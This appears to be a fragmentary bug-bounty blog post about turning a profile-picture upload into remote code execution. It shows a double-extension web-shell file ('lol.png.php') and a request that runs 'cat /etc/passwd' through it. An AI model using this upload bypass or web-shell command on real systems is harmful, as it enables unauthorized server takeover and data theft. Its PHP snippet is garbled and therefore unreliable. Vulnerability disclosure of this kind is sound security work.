File Upload to RCE

Let’s go……

( احمينا ياااا رب )
alt=”photo here”
cannot be displayed because it contains errors.
Profile updated successfully
Code HTML and JS and some PHP work but all parameter not work
All Commands in parameter not work and blocked
oh nice…
كمان واحده و النبى ياريس 😂😂 كفايه بجي😂😂ء
$handle = fopen("inputfile.txt", "r");
if ($handle) {
while (($line = fgets($handle)) !== false) {
// process the line read.}
fclose($handle);
}else {error opening the file.}
happy and sad
example.com/uploads/96/lol.png.php?c=cat /etc/passwd
All Done

I report that as RCE the severity become P1 …. :)

--

--

--

Interested in infosec || CTF Player || Pentester || Bug Hunter || Security Researcher

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Amazon EKS — Managed Kubernetes Service from AWS

Easy REST APIs with AutoRest

Cloud Certifications to Start Your Cloud Career in 2022

Create Handwritten Text Animation using Adobe Illustrator.

Setup Datadog Monitoring For MongoDB

They myth of the 10x engineer and what we’re getting wrong.

Difference between “Argument“ and “Parameter“ in programming

Turbochain Summary

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Magdy

Ahmed Magdy

Interested in infosec || CTF Player || Pentester || Bug Hunter || Security Researcher

More from Medium

Exploiting CVE-2019–5418- File Content Disclosure on Rails

Rate Limit Bypass at Readme.com

BugBounty: Algolia key disclosure vulnerability

RCE in .tgz file upload